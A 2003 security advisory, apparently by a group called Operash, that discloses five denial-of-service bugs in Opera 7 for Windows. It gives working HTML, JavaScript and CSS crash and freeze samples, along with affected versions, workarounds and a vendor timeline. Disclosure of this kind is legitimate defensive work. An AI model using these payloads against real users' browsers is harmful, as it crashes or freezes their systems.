--------------------------------------------------------------------------------- TITLE :[Opera 7] Five DoS codes on general web sites -= Fastest browser on earth, Fastest crash on earth too =- PRODUCT : Opera for Windows VERSIONS : 7.11b build 2887 7.11 build 2880 7.10 build 2840 7.03 build 2670 VENDOR : Opera Software ASA (http://www.opera.com/) SEVERITY : Medium. Abnormal Termination, Freeze, and DoS attacks. DISCOVERED BY : imagine, nesumin AUTHOR : :: Operash :: REPORTED DATE : 2003-06-24 PUBLISHED DATE : 2003-07-01 ---------------------------------------------------------------------------------- 0. PRODUCT INFORMATION ======================== Opera for Windows is a GUI base Web browser. Opera Software ASA (http://www.opera.com/) 1. DESCRIPTION ================ There are many unfixed bugs that cause abnormal termination or freeze down in Opera 7. Exploiting these bugs, attackers can do DoS attacks. Followings are 5 sample codes, which are in general web sites. 2. SAMPLE CODE & IMPACT ========================= [ CODE 1 ] Just 12 bytes data "<!DOCTYPE" + NULL(\x00) + 1byte + ">" makes CPU usage go up to 100%(depending on comp specs) and the computer gets freeze down. ----------------------------------------------------------------- <!DOCTYPE[\x00]A> ----------------------------------------------------------------- [ CODE 2 ] Abnormal termination is caused. ----------------------------------------------------------------- <form></form><script>document.forms[0].submit()</script> ----------------------------------------------------------------- [ CODE 3 ] Abnormal termination is caused. ----------------------------------------------------------------- <table> <tr id="crash" style="display:inline"><td> <script>crash.style.display = "none";</script> </td></tr> </table> ----------------------------------------------------------------- [ CODE 4 ] Abnormal termination is caused. ----------------------------------------------------------------- <table> <map id="crash" style="position:absolute"></map> <script>crash.style.height = crash.style.width = '0';</script> </table> ----------------------------------------------------------------- [ CODE 5 ] CPU usage go up to 100%(depending on comp specs) and the computer gets freeze down. ----------------------------------------------------------------- <html> <head> <style type="text/css"> <!-- .aaaaa:after{content:"A";display:block} .bbbbb{display:run-in} .ccccc{display:inline-block} //--> </style> </head> <body> <div class="aaaaa"> <div class="bbbbb"> <div class="ccccc"> </div> </div> </div> </body> </html> ----------------------------------------------------------------- 3. SYSTEMS AFFECTED ===================== Opera (For Windows) 7.11b build 2887 7.11 build 2880 7.10 build 2840 7.03 build 2670 (Excepting [ CODE 5 ]) Lower than 7.03 Versions might be affected too. (not tested) 4. EXAMINES ============= Opera (For Windows, English/Japanese) : 7.11b build 2887 7.11 build 2880 7.10 build 2840 7.03 build 2670 Platform : Windows 98SE Japanese Edition Windows 2000 Pro SP3 Japanese Edition 5. WORKAROUND =============== [ CODE 1 ] ----- [ CODE 2 ] Disable "JavaScript" [ CODE 3 ] Disable "JavaScript" [ CODE 4 ] Disable "JavaScript" [ CODE 5 ] Disable "CSS Author mode" 6. TIME TABLE & VENDOR STATUS =============================== 2003-06-24 Reported to vendor. 2003-07-01 Released this advisory. No reply from vendor. 7. DISCLAIMER =============== A. We cannot guarantee the accuracy of all statements in this information. B. We do not anticipate issuing updated versions of this information unless there is some material change in the facts. C. And we will take no responsibility for any kinds of disadvantages by using this information. D. You can quote this advisory without our permission if you keep the following; a. Do not distort this advisory's content. b. A quoted place should be a medium on the Internet. E. If you have any questions, please contact to us. * Exception We strictly forbid 'Secunia' to republish or redistribute our advisory. ...Well, even though, we know this request would be ignored. The CTO of Secunia has told us; "If you do not want us to write about your vulnerabilities - then stop posting them!" Well.. We can do nothing for this sort of arrogance :/ 8. CONTACT, ETC ================= :: Operash :: imagine (Operash Webmaster) nesumin <nesumin@softhome.net> Thanks to : melorin piso(sexy)